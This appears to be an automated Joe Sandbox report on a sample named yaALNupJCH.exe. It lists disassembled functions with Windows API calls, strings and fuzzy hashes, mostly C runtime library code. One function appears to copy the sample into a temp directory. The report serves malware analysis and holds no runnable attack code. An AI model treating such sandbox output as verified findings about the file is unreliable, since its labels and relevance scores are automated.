Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a07fb07f9ed11dad217a386fc2e13d4ea943475430fdfd0535cac9ac8b732c12
Instruction ID: cbde20585bd5b06534af7157450b9e4fdfbd109f8aa369ef0c9eb7937643c0f8
Opcode Fuzzy Hash: a07fb07f9ed11dad217a386fc2e13d4ea943475430fdfd0535cac9ac8b732c12
Instruction Fuzzy Hash: F1115171540B88AADA20B7B0CD47FDBB7BC9F00700F444D2DF69A6A0A2DA75F506A752

Uniqueness

Uniqueness Score: -1.00%

Function 00CCEB09 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00CB48D0,00000000), ref: 00CCEB51
__fassign.LIBCMT ref: 00CCED30
__fassign.LIBCMT ref: 00CCED4D
WriteFile.KERNEL32(?,00CB48D0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCED95
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CCEDD5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCEE81

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 8b3bce1d7494aaf8ee9bc33d601163fb79db8dc00654b7f27fa25a0c501bfd9c
Instruction ID: 185fd0f332119e06065a952d780315ddb6ac65f8e7eb9f168862a0c208440580
Opcode Fuzzy Hash: 8b3bce1d7494aaf8ee9bc33d601163fb79db8dc00654b7f27fa25a0c501bfd9c
Instruction Fuzzy Hash: 45D16971D002589FCB15CFA8C980EEDBBB5BF49314F28416EE856BB342D731AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3734 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00CC372B,00CC3599,00CC2CB5), ref: 00CC3742
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC3750
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC3769
SetLastError.KERNEL32(00000000,00CC372B,00CC3599,00CC2CB5), ref: 00CC37BB

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
Instruction ID: dc8aa67b92e72b64679542a0f475a74fdcda9298dc4fdd92ca2881420000e503
Opcode Fuzzy Hash: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
Instruction Fuzzy Hash: 2F01B1B2609792AFE6142675FDDAF5B27A8EB06774720822EF424890F2EE116F006344

Uniqueness

Uniqueness Score: -1.00%

Function 00CCBF61 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 00CCBF66

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\yaALNupJCH.exe
API String ID: 0-3763621502
Opcode ID: d2ed949b186fdfc979583f5e39890ed5909470de899ac4ea3bb91c2e01c8eafc
Instruction ID: aee02ef49978014f96827d0d0bf376534454e40adbe585ea3c207807a657c3a7
Opcode Fuzzy Hash: d2ed949b186fdfc979583f5e39890ed5909470de899ac4ea3bb91c2e01c8eafc
Instruction Fuzzy Hash: 39219D71604209EFDB20AFA1DC81F2B77ADEF443A8B10452CF92996291E731ED419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC5586 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00CC55C8

Strings

.cmd, xrefs: 00CC55E6
.bat, xrefs: 00CC55F7
.com, xrefs: 00CC5608
.exe, xrefs: 00CC55D5

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
Instruction ID: 86941417921903d24e2c735264c716ba234c8beb55cd261c2ca8a4969ff0fc96
Opcode Fuzzy Hash: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
Instruction Fuzzy Hash: 7501267B614E15652624606DEC02F3F57988B91BB8726002FF968F73C2EE94FE8251D4

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3A44 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00CC3A94

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
Instruction ID: cdda17936324947e2bd70ff6501ccbe15f467590b053c277106c794572e69b87
Opcode Fuzzy Hash: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
Instruction Fuzzy Hash: D511C831A01665FBCB229BE5FC44F1E7758AF05760B158159ECA7A72D0D730EF10A6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC4AF3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CC4AE8,00CC814B,?,00CC4AB0,00CC5036,?,00CC814B), ref: 00CC4B08
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC4B1B
FreeLibrary.KERNEL32(00000000,?,?,00CC4AE8,00CC814B,?,00CC4AB0,00CC5036,?,00CC814B), ref: 00CC4B3E

Strings

CorExitProcess, xrefs: 00CC4B13
mscoree.dll, xrefs: 00CC4B01

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
Instruction ID: 426fd54d3ad1dbdd7f1014929ad5a0b302cd262f2bdff15235838a320106c2ec
Opcode Fuzzy Hash: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
Instruction Fuzzy Hash: 93F0A030602619FBDB25AB51DD1AFDEBB79EB00756F104066F911A21A0CF74CF00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD3A89 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(014D1E88,014D1E88,?,7FFFFFFF,?,?,00CD3D45,014D1E88,014D1E88,?,014D1E88,?,?,?,?,014D1E88), ref: 00CD3B2C
__alloca_probe_16.LIBCMT ref: 00CD3BE2
__alloca_probe_16.LIBCMT ref: 00CD3C78
__freea.LIBCMT ref: 00CD3CE3
__freea.LIBCMT ref: 00CD3CEF

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 367aaadf189f49b627d938ea2443066253b6a03fc6f9d3459a7188300a7a9510
Instruction ID: 76de982beeed2ae9460e2ad174b3520c45739204e051398234e1a144de85d0cf
Opcode Fuzzy Hash: 367aaadf189f49b627d938ea2443066253b6a03fc6f9d3459a7188300a7a9510
Instruction Fuzzy Hash: 85811672A10299ABDF209F54C881EEF7BB5AF49710F18015BEA14B7341D725CF40DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD22F4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00CD2378
__alloca_probe_16.LIBCMT ref: 00CD243E
__freea.LIBCMT ref: 00CD24AA

Part of subcall function 00CC8E3A: RtlAllocateHeap.NTDLL(00000000,00CC0FAC,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC8E6C

__freea.LIBCMT ref: 00CD24B3
__freea.LIBCMT ref: 00CD24D6

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 9a70c1ababa350f50bf119b30e264b46ab0cf187da7923bd028fbf24d3ce0159
Instruction ID: 8a14cee48cf2c0debc55a2d8e9f821d7c847a7b156e6bc3177486657c944f374
Opcode Fuzzy Hash: 9a70c1ababa350f50bf119b30e264b46ab0cf187da7923bd028fbf24d3ce0159
Instruction Fuzzy Hash: 6F51E172600216ABDF219F64CC81FBF36A9DF94754F15412AFE18A7350EB38DE5096A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD2CF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CCD2E7

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979

_free.LIBCMT ref: 00CCD2F9
_free.LIBCMT ref: 00CCD30B
_free.LIBCMT ref: 00CCD31D
_free.LIBCMT ref: 00CCD32F

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f5333d60b850bfe1c6d5cd7f7bf0796ef816a372ebf786af5d0af39b683d8508
Instruction ID: 661d7600a50076d8fe7d7fda977e0184b5958523795b63f8e5c09ffac5bfe99a
Opcode Fuzzy Hash: f5333d60b850bfe1c6d5cd7f7bf0796ef816a372ebf786af5d0af39b683d8508
Instruction Fuzzy Hash: C3F0127350829577C620DF65E9CAF2A73FDAA007107680D1DF059DB691CF30FE854665

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB99C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CCBB36

Strings

*?, xrefs: 00CCB9DF

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: fd1e0e354beaa488c2f21d300c3ad5031be2a8db77353ec4815969317262a2b5
Instruction ID: e7514e84bd23bae6fa9768825e37cd913a495a1e8153538b57ef323cd696b15a
Opcode Fuzzy Hash: fd1e0e354beaa488c2f21d300c3ad5031be2a8db77353ec4815969317262a2b5
Instruction Fuzzy Hash: 04610A75D002199FCB14DFA9C882AEEBBF5EF48310F24816EE855E7340D731AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8570 Relevance: 6.4, APIs: 4, Instructions: 398fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB4210: GetVersionExW.KERNEL32(0000011C,?,777D6490), ref: 00CB4267

GetTempPathA.KERNEL32(00000104,?), ref: 00CB85D7
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00CB88D9
CreateDirectoryA.KERNEL32(00000000,00000000,?,?), ref: 00CB8A1C
CopyFileA.KERNEL32 ref: 00CB8A49

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CopyCreateDirectoryModuleNamePathTempVersion
String ID:
API String ID: 2921419681-0
Opcode ID: 028aeedebee3abb872d2edabea83328a9dffb9cebf49c3ed5bf535fbdc402797
Instruction ID: ea72b35fa19d5273630498d748d10e8c7de8553821315f01a12024f445a9ef00
Opcode Fuzzy Hash: 028aeedebee3abb872d2edabea83328a9dffb9cebf49c3ed5bf535fbdc402797
Instruction Fuzzy Hash: DCD1E971D001089BEF08EB64DC9ABEDBB3AAF42304F54411CF445A72D6EF359A89DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCAF1F Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00CCAFA6

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c3520e6fa4c543582bc0414abcdd52856e812a60995d276b06546b24adf838ec
Instruction ID: 0bf8f05058927b39290233d270046819688167186ddedb903eaacdc1ff971e27
Opcode Fuzzy Hash: c3520e6fa4c543582bc0414abcdd52856e812a60995d276b06546b24adf838ec
Instruction Fuzzy Hash: 94B144729006459FDB118FA8C892FBEBBF5EF45340F1841AEE861DB241D7359E02CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD292E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CD29FE
_free.LIBCMT ref: 00CD2A27
SetEndOfFile.KERNEL32(00000000,00CCE60E,00000000,00CC87EE,?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000), ref: 00CD2A59
GetLastError.KERNEL32(?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000,?,?,?,?,00000000), ref: 00CD2A75

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 624cbb72d69ff08087c93961b7cb2a923c1150c0768e4771583c009ad8420c7d
Instruction ID: 7867067bb0d2a13ad74349d17a490d27aad403386dc6117c46114e9cae82ce35
Opcode Fuzzy Hash: 624cbb72d69ff08087c93961b7cb2a923c1150c0768e4771583c009ad8420c7d
Instruction Fuzzy Hash: DB41F632900645ABDB21ABA9CC42F9E7775EF58370F240516F628E73A1EA31DD41B721

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB8CD Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00CC4F1F: _free.LIBCMT ref: 00CC4F2D

Part of subcall function 00CCC8A4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00CD24A0,?,00000000,00000000), ref: 00CCC946

GetLastError.KERNEL32 ref: 00CCB935
__dosmaperr.LIBCMT ref: 00CCB93C
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00CCB97B
__dosmaperr.LIBCMT ref: 00CCB982

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: f173b5e58cc131f6ec306fe5523fbc03503eafbde78191dbebae08dd6ce1f649
Instruction ID: 37deb0d49f98746df2da3ad3a675ffd31fb363036b326d085692d6b80533dc44
Opcode Fuzzy Hash: f173b5e58cc131f6ec306fe5523fbc03503eafbde78191dbebae08dd6ce1f649
Instruction Fuzzy Hash: 5D21B371A00615AF9B206FE6CC82F6BB7ACEF44364F14852CFA6D97191D734ED4097A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9242 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000078,00CC0FB3,0000007C,00CC4E9D,00CC0FB3,?,00000000,?,00CC5036,777D6490,00000078,777D6490,?,?,?,00CB2B9A), ref: 00CC9247
_free.LIBCMT ref: 00CC92A4
_free.LIBCMT ref: 00CC92DA
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CC5036,777D6490,00000078,777D6490,?,?,?,00CB2B9A,?), ref: 00CC92E5

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7367e503f15cd5f4f6e38803555051a89cf11219f19a9229e3f1f92e76cf2f37
Instruction ID: 4dc4d1f31a5ef86c69f504da09f09ae0e0bf13bf42f09289aba4e93cada2ac00
Opcode Fuzzy Hash: 7367e503f15cd5f4f6e38803555051a89cf11219f19a9229e3f1f92e76cf2f37
Instruction Fuzzy Hash: A511C632205141BA9B107AB5DCCFF7F3159DBC2775B25022DF539971D2EE318D056210

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9399 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00CC0FAC,00CC0FAC,E800CE41,00CC5905,00CC8E7D,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC939E
_free.LIBCMT ref: 00CC93FB
_free.LIBCMT ref: 00CC9431
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC943C

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a9cc310f8ba931e555e8c3b1ac75741a6a5baafc6dbe38db97728e90e920b47c
Instruction ID: 19b910c46aa5345445a8dd60fe0273e068394b7b32330024d0a1b7aacaed66e9
Opcode Fuzzy Hash: a9cc310f8ba931e555e8c3b1ac75741a6a5baafc6dbe38db97728e90e920b47c
Instruction Fuzzy Hash: D511E532605582AA96107A75ECCFF7F2559DBC1774B29022CF538971E1EF318D066220

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9BE4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001), ref: 00CC9BFA
